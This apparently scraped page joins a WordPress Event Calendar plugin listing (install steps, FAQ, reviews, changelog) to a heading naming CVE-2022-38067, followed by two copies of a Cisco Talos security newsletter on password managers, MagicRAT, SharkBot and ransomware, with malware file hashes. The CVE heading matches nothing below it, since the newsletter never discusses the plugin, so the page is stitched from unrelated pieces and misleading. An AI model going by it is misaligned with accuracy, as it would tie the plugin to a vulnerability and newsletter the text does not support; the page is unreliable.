**The Plugin is Truly Wonderful** – You can create a very nice and beautiful calendar for your website. The plugin is easily editable and functionality perfectly.

**Link** – There is a special place for adding a Link to each event. Choose to open the Link in the new tab or not.

**Technical Support**

*   If you notice any errors or have any questions with our event calendar, you can notify us. We will investigate and solve the problem. Check out the Event Calendar Support Forum on our website. If you don’t find a solution to your question here, don’t hesitate to click here to contact us.

THANK YOU FOR YOUR INTEREST IN EVENT CALENDAR TS.

Here’s how you install and activate the Event Calendars plugin:

Download the plugin.  
Upload the .zip file in your WordPress plugin directory.  
Activate the plugin from the “Plugins” menu in WordPress.  
After activating Event Calendar, choose the type of version you wish to use.

For users of MAC

*   Go to the downloads folder and local the folder with the event calendar.
*   Right click on the folder and select Compress. Now you have just created the .zip file, which can be installed as described here.
*   Click the download and install button to download and install the plugin.
*   Click the Activate plugin button to activate the calendar plugin.
*   If the installation is succeeded, you will see a message in the image.
*   In case of any problems during the installation of the calendar, please click here to contact us.

**1). There are some restrictions for adding events?**

*   There is no limit for the amount of events.
*   You can add as many events as you want. Plugin has no limitations.

**2.) How many calendar may I create for WordPress website?**

*   You may create unlimited calendars by this plugin and by many options.

**3.) How to change the font size of the theme?**

*   The settings can include custom header settings where you can adjust the font size and see the results in the live preview.

**4.) How can I add plugin in widget?**

*   Get to the widget, then add our plugin widget to the sidebar. Then select your name.

**5.) How many themes can I create for my plugin?**

*   You can create as many themes as you want.

**6.) \*\*\*\* Where to change the settings?**

*   The settings you can change in the manager’s calendar.

**7.) I create an event in the calendar but it does not show. What can I do?**

*   First, check that you don’t have the same plugin again.
*   It is necessary to write the begging and ending day of the event.
*   If you have Safari, Firefox, Opera or Internet Explorer, you must write yyyy-mm-dd , that would show the events in calendar.

**8). How many calendar themes can I create for my plugin?**

*   You can create as many themes as you want.

**9.) How many event can I create for my plugin?**

*   You can create as many events as you need.

**10.) Has each event own color or color is for everyone in Simple Type?**

*   In this version you are setting events color in general options and its for all events. In Total Calendar and Timeline types each event has its own color.

**11.) How to change date format?**

*   If you need to change event date format, please open Event Manager Settings and type necessary type in Date format input. For instance, in case you want to have dates as 08/1/2020, set the format to M/d/Y.

awesomeness in this calendar

I bought the full version. After installing on my template, not everything was fine, but the support from the developer was great / fast. The calendar fully suits me both in terms of features and usability bars - on pages or widgets. So far, I am very satisfied.

In my case I needed a yearly calendar. It is the plugin that I was looking for. Functional, easy to use, cheap ... In addition, the customer service is incredible. I definitely recommend it.

This plugin is all I need for a simple event calendar with no bells and whistles. Had some issues in the beginning with the backend but support fixed them quickly and released an updated version. The only issues I have now, I have with all free plugins. They all seem to think it is okay to bombard us with promotions to upgrade to pro. If that is what we wanted we would have done this once we confirmed the plugin was well structured and we could use the added features. Why not allow us to remove the promos forever? After all there is a link to your page inside the plugin itself if we change our minds later.

We had a Problem with the Size of the Date for one Calendar Type, because we wanted it to be different from the headline of one event, so we contacted the Support. It was really really fast and help us out as fast as possible. They even changed the code for us so we got what we wanted. I never saw that Developer made a change for one single user. Its awesome Service in my opinion! I would recommend this plugin again, if you want to use a simple but clear calendar plugin for wordpress.

Read all 98 reviews

“Event Calendar – Calendar” is open source software. The following people have contributed to this plugin.

Contributors

*    totalsoft

**Version 1.4.8**

*   Changed TS Poll plugin banner

**Version 1.4.7**

*   Fixed a bug in the plugin.

**Version 1.4.6**

*   Fixed issue with theme options.

**Version 1.4.5**

*   Fixed bug with admin panel.

**Version 1.4.4**

*   Added the ability to change the icon to events.
*   Changed several fonts.
*   Fixed bugs related to PHP 8 version.

**Version 1.4.3**

*   Fixed bug in “update” functions.

**Version 1.4.2**

*   Fixed bug in “edit” functions.

**Version 1.4.1**

*   Changed function for font size.
*   Fixed issue in events option.

**Version 1.4.0**

*   Fixed a bug for showing the event.

**Version 1.3.9**

*   Added font for days on the calendar.
*   Fixed bug related icons.

**Version 1.3.8**

*   Added the ability to put days on the center.

**Version 1.3.7**

*   Added the ability to select icons back to the calendar after the event.

**Version 1.3.6**

*   Fixed a bug in the Timeline type. After changing the language this type was did not work.

**Version 1.3.5**

*   Added a new opportunity in the timeline version. Shows the current days at first.
*   Fixed a bug in the flexible version. The start and the end of days in the event, showed only the starting day.
*   Fixed a bug in the Timeline version. When the year did not had any event it do not show the next year�s events.

**Version 1.3.4**

*   The bug in the “Total Soft Calendar” version has been fixed. The description is not shown in the calendar.
*   Fixed a bug with recurring events.

**Version 1.3.3**

*   Added possibility to preview the theme in calendar before putting it on the page.
*   Updated translations.
*   Changed admin menu design.

**Version 1.3.2**

*   Added Google fonts to the basic fonts.
*   Added possibility to make recurring events.
*   Added box shadow options for all types.
*   Fixed bug with media uploading process.

**Version 1.3.1**

*   Updated function for creating Simple type.

**Version 1.3.0**

*   Changed Media uploading function.
*   Changed admin menu style.
*   Added languages for Timeline type.
*   Changed function for constructing Timeline calendar.

**Version 1.2.9**

*   Changed CSS style for Flexible Calendar type.
*   Updated uploading function for videos and images.
*   Changed Basic function for creating Timeline Calendar.

**Version 1.2.8**

*   Fixed bug In Flexible Calendar type (Did not show the year in the calendar).
*   Changed all functions for creating calendar.
*   Updated the function for creating the events by ordering.

**Version 1.2.7**

*   Fixed PHP error in widget.

**Version 1.2.6**

*   Fixed a bug in the widget.

**Version 1.2.5**

*   Added new Type of calendar: ” Timeline Calendar “
*   Opened some functions for free version.

**Version 1.2.4**

*   Added possibility to create more than one flexible Calendar on the same page.

**Version 1.2.3**

*   Added Secondary question for deleting calendar or events.

**Version 1.2.2**

*   Added new text editor for making event description.

**Version 1.2.1**

*   In Category ” Total Products ” added new plugin ” Event Calendars ” by Total-Soft.

**Version 1.2.0**

*   Modified the Design Admin Panel.

**Version 1.1.9**

*   Added possibility to create more than one Simple Calendar on the same page.

**Version 1.1.8**

*   Tested with WP version 4.7.3.

**Version 1.1.7**

*   Added a function into the first and second versions. You can add descriptions, pictures, videos and choose time format.

**Version 1.1.6**

*   Added a new color picker type.
*   Opened some functions for free version.

**Version 1.1.5**

*   Added translations in several languages for the month names and weekday names.
*   Fixed bug in Flexible Calendar type with translation.

**Version 1.1.4**

*   Added new menu in the plugin.

**Version 1.1.3**

*   Fixed bugs in the 3 calendar types.

**Version 1.1.2**

*   Added new Calendar Type “Flexible Calendar” in which you can add events with images and videos from YouTube and Vimeo.

**Version 1.1.1**

*   Added Italian translation.

**Version 1.1.0**

*   Fixed a bug with icons.

**Version 1.0.8**

*   Issue with date format solved

**Version 1.0.7**

*   Fixed a problem with the widget

**Version 1.0.6**

*   Added new Type of calendar: ” Simple Calendar “

**Version 1.0.5**

*   Changed in the Admin panel
*   Added educational text for the users how to adjust the calendar

**Version 1.0.4**

*   Fixed Syntax Error

**Version 1.0.3**

*   Changed free version some parameters

**Version 1.0.2**

*   Fixed a bug in the event

**Version 1.0.1**

*   Fixed a little bug that was affecting some users

**Version 1.0.0**

*   Initial Version Release

CVE-2022-38067: Event Calendar – Calendar

By Jon Munshaw. 



Welcome to this week’s edition of the Threat Source newsletter. 



It seems like there’s at least one major password breach every month — if not more. Most recently, there was an incident at Plex where all users had to reset their passwords.  


Many users pay for a password management service — which is something I’ve talked about a ton for Talos. But even those aren’t a one-size-fits-all solution. LastPass, one of the most popular password management services, recently suffered a breach of their own internal development environment, though as of right now, it doesn’t appear like any users’ primary passwords were compromised. 


This got me curious about how people prefer to manage their passwords, so I threw up a poll on our Twitter asking our readers how they managed their passwords. Paid password management services like LastPass and 1Password were the most popular response, followed by web browser-based managers like the ones Chrome and Safari offer. Several of the replies reminded me that there is another popular option I managed to neglect: open-source, operating system-independent solutions like KeePass. These are an appealing option because they’re free, while many of the other services I’ve mentioned charge a monthly or yearly fee, and they are cloud-based with strong encryption of the passwords they store, which is especially appealing for people jumping between operating systems or machines.  


These aren’t perfect solutions either, though, because many of these open-source solutions rely on unofficial ports to mobile operating systems to run on phones and they are a bit harder to parse for the “everyday” user. I would have more faith in my parents to download an app from 1Password and be able to figure it out than trying to use open-source software in their web browser, and they are the types of users most likely to fall victim to something like a phishing scam looking to break into these password managers.  


Web browser managers also aren’t as secure as other managed options and open the door to some serious consequences if a bad actor is to compromise your Google account login and then steals every other login you have.  


Unless users are ready to go back to the old-fashioned “write everything down in a notebook” solution, which also has its own set of problems, it seems like there is no perfect solution to keeping passwords safe. Instead, we need to learn from the benefits of each of these types of solutions to improve our password hygiene.  


We could all afford to mix up our passwords and use long strings with multiple types of characters like web browsers will encourage users to do. But we also need several layers of authentication to access our primary password like users need to do for paid software services.  


And even then, we still have a long way to go to encourage the “average” user and administrator about secure passwords. I recently learned that the Wi-Fi password at my wife’s health care-based office is a string of numbers so easy to guess I wouldn’t even feel bad for just typing it out here (but I won’t) — so maybe we need to clear that hurdle before we start trying to convert everyone to open-source password managers.  

  

The one big thing 




The Lazarus Group, a well-known state-sponsored threat actor, is adding to its arsenal with a new trojan Talos recently discovered called “MagicRAT.” Lazarus deployed MagicRAT in several instances after the successful exploitation of vulnerabilities in VMWare Horizon platforms. While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely.  

Why do I care? 
The discovery of MagicRAT in the wild is an indication of Lazarus' motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide. Lazarus is already a formidable threat actor that’s been incredibly active this year, including major cryptocurrency-related attacks aimed at generating money for the North Korean government and subverting international sanctions. Any new developments from this group are noteworthy for the security community at large. 
So now what? 
In the attacks we observed, Lazarus Group commonly exploited VMware vulnerabilities, so users should update any products they’re using as soon as possible. Additionally, we’ve released new Snort rules and OSqueries to detect any MagicRAT activities and block it before the attackers can get any further.  
 

Top security headlines from the week


The newest version of a well-known banking trojan on the Google Play store is masquerading as legitimate antivirus software and has already been installed on tens of thousands of devices. SharkBot, which was first discovered in February, infects Android users and then tries to initiate unwanted bank transfers by stealing users’ login information and intercepting SMS multi-factor authentication messages. The malware disguises itself as two apps: Mister Phone Cleaner, which has more than 50,000 downloads so far on the Google Play store, according to security researchers, and Kylhavy Mobile Security, which has been downloaded more than 10,000 times. Affected victims are in several different countries, including the U.S., Spain, Australia, Poland, Germany and Austria. (Bleeping Computer, Tech Monitor) 
Many students are heading back to school across the U.S., which also means an increased risk of cyber attacks for those schools. Threat actors traditionally try to target the education sector during this period when schools are more susceptible to an attack and more likely to pay any ransom payments. The massive, combined school district in Los Angeles, California was hit with a ransomware attack this week, forcing more than 600,000 students and staff to reset their passwords. It’s currently unclear what information if any, was stolen, but students could attend school as planned after the Labor Day weekend. The U.S. federal government even deployed cybersecurity-related agencies to the district to assist with the district’s recovery. (NPR, Washington Post) 
Local police departments have been using a little-known location-tracking service since 2018 that can allow them to track suspects’ locations without a warrant. The software, called Fog Reveal, allows the customer to use data harvested from others’ smartphones to track the location and other activities of suspects. Law enforcement has already used it to investigate several different types of crimes, including murder investigations and potential crimes surrounding the attempted insurrection on the U.S. Capitol on Jan. 6, 2021. However, the use of the software is rarely mentioned in court documents when used as part of a criminal trial. (Associated Press, Vice Motherboard) 


Can’t get enough Talos? 

North Korean Hackers Deploying New MagicRAT Malware in Targeted Campaigns
Multiple ransomware data leak sites experience DDoS attacks, facing intermittent outages and connectivity issues
Researcher Spotlight: How Asheer Malhotra looks for 'instant gratification' in threat hunting
Threat Roundup for Aug. 26 – Sept. 2
Talos Takes Ep. #111 (XL Edition): Talos' update on our work in Ukraine




Upcoming events where you can find Talos 


Cisco Security Solution Expert Sessions (Oct. 11 & 13)
Virtual 



Most prevalent malware files from Talos telemetry over the past week  



SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c
MD5: a087b2e6ec57b08c0d0750c60f96a74c    
Typical Filename: AAct.exe    
Claimed Product: N/A      
Detection Name: PUA.Win.Tool.Kmsauto::1201 



SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  


SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 
MD5: 8c69830a50fb85d8a794fa46643493b2 
Typical Filename: AAct.exe 
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 


SHA 256: 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681 
MD5: f1fe671bcefd4630e5ed8b87c9283534 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net  
Detection Name: PUA.Win.Tool.Hackkms::1201 


SHA 256: 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7 
MD5: 0e4c49327e3be816022a233f844a5731 
Typical Filename: aact.exe 
Claimed Product: AAct x86 
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

Many users pay for a password management service — which is something I’ve talked about a ton for Talos. But even those aren’t a one-size-fits-all solution. LastPass, one of the most popular password management services, recently suffered a breach of their own internal development environment, though as of right now, it doesn’t appear like any users’ primary passwords were compromised. 

This got me curious about how people prefer to manage their passwords, so I threw up a poll on our Twitter asking our readers how they managed their passwords. Paid password management services like LastPass and 1Password were the most popular response, followed by web browser-based managers like the ones Chrome and Safari offer. Several of the replies reminded me that there is another popular option I managed to neglect: open-source, operating system-independent solutions like KeePass. These are an appealing option because they’re free, while many of the other services I’ve mentioned charge a monthly or yearly fee, and they are cloud-based with strong encryption of the passwords they store, which is especially appealing for people jumping between operating systems or machines.  

These aren’t perfect solutions either, though, because many of these open-source solutions rely on unofficial ports to mobile operating systems to run on phones and they are a bit harder to parse for the “everyday” user. I would have more faith in my parents to download an app from 1Password and be able to figure it out than trying to use open-source software in their web browser, and they are the types of users most likely to fall victim to something like a phishing scam looking to break into these password managers.  

Web browser managers also aren’t as secure as other managed options and open the door to some serious consequences if a bad actor is to compromise your Google account login and then steals every other login you have.  

Unless users are ready to go back to the old-fashioned “write everything down in a notebook” solution, which also has its own set of problems, it seems like there is no perfect solution to keeping passwords safe. Instead, we need to learn from the benefits of each of these types of solutions to improve our password hygiene.  

We could all afford to mix up our passwords and use long strings with multiple types of characters like web browsers will encourage users to do. But we also need several layers of authentication to access our primary password like users need to do for paid software services.  

And even then, we still have a long way to go to encourage the “average” user and administrator about secure passwords. I recently learned that the Wi-Fi password at my wife’s health care-based office is a string of numbers so easy to guess I wouldn’t even feel bad for just typing it out here (but I won’t) — so maybe we need to clear that hurdle before we start trying to convert everyone to open-source password managers.  

**The one big thing **

The Lazarus Group, a well-known state-sponsored threat actor, is adding to its arsenal with a new trojan Talos recently discovered called “MagicRAT.” Lazarus deployed MagicRAT in several instances after the successful exploitation of vulnerabilities in VMWare Horizon platforms. While being a relatively simple RAT capability-wise, it was built with recourse to the Qt Framework, with the sole intent of making human analysis harder, and automated detection through machine learning and heuristics less likely.  

> **Why do I care? **The discovery of MagicRAT in the wild is an indication of Lazarus' motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide. Lazarus is already a formidable threat actor that’s been incredibly active this year, including major cryptocurrency-related attacks aimed at generating money for the North Korean government and subverting international sanctions. Any new developments from this group are noteworthy for the security community at large. **So now what? **In the attacks we observed, Lazarus Group commonly exploited VMware vulnerabilities, so users should update any products they’re using as soon as possible. Additionally, we’ve released new Snort rules and OSqueries to detect any MagicRAT activities and block it before the attackers can get any further.  

**Top security headlines from the week**

The newest version of a well-known banking trojan on the Google Play store is masquerading as legitimate antivirus software and has already been installed on tens of thousands of devices. SharkBot, which was first discovered in February, infects Android users and then tries to initiate unwanted bank transfers by stealing users’ login information and intercepting SMS multi-factor authentication messages. The malware disguises itself as two apps: Mister Phone Cleaner, which has more than 50,000 downloads so far on the Google Play store, according to security researchers, and Kylhavy Mobile Security, which has been downloaded more than 10,000 times. Affected victims are in several different countries, including the U.S., Spain, Australia, Poland, Germany and Austria. (Bleeping Computer, Tech Monitor) 

Many students are heading back to school across the U.S., which also means an increased risk of cyber attacks for those schools. Threat actors traditionally try to target the education sector during this period when schools are more susceptible to an attack and more likely to pay any ransom payments. The massive, combined school district in Los Angeles, California was hit with a ransomware attack this week, forcing more than 600,000 students and staff to reset their passwords. It’s currently unclear what information if any, was stolen, but students could attend school as planned after the Labor Day weekend. The U.S. federal government even deployed cybersecurity-related agencies to the district to assist with the district’s recovery. (NPR, Washington Post) 

Local police departments have been using a little-known location-tracking service since 2018 that can allow them to track suspects’ locations without a warrant. The software, called Fog Reveal, allows the customer to use data harvested from others’ smartphones to track the location and other activities of suspects. Law enforcement has already used it to investigate several different types of crimes, including murder investigations and potential crimes surrounding the attempted insurrection on the U.S. Capitol on Jan. 6, 2021. However, the use of the software is rarely mentioned in court documents when used as part of a criminal trial. (Associated Press, Vice Motherboard) 

**Can’t get enough Talos? **

*   North Korean Hackers Deploying New MagicRAT Malware in Targeted Campaigns
*   Multiple ransomware data leak sites experience DDoS attacks, facing intermittent outages and connectivity issues
*   Researcher Spotlight: How Asheer Malhotra looks for 'instant gratification' in threat hunting
*   Threat Roundup for Aug. 26 – Sept. 2
*   Talos Takes Ep. #111 (XL Edition): Talos' update on our work in Ukraine

**Upcoming events where you can find Talos ****Most prevalent malware files from Talos telemetry over the past week  **

**MD5:** a087b2e6ec57b08c0d0750c60f96a74c    

**Typical Filename:** AAct.exe    

**Claimed Product:** N/A      

**Detection Name:** PUA.Win.Tool.Kmsauto::1201 

**MD5:** 8c69830a50fb85d8a794fa46643493b2 

**Typical Filename:** AAct.exe 

**Claimed Product:** N/A  

**Detection Name:** PUA.Win.Dropper.Generic::1201 

**MD5:** f1fe671bcefd4630e5ed8b87c9283534 

**Typical Filename:** KMSAuto Net.exe 

**Claimed Product:** KMSAuto Net  

**Detection Name:** PUA.Win.Tool.Hackkms::1201 

**MD5:** 0e4c49327e3be816022a233f844a5731 

**Typical Filename:** aact.exe 

**Claimed Product:** AAct x86 

**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos

Tag

#chrome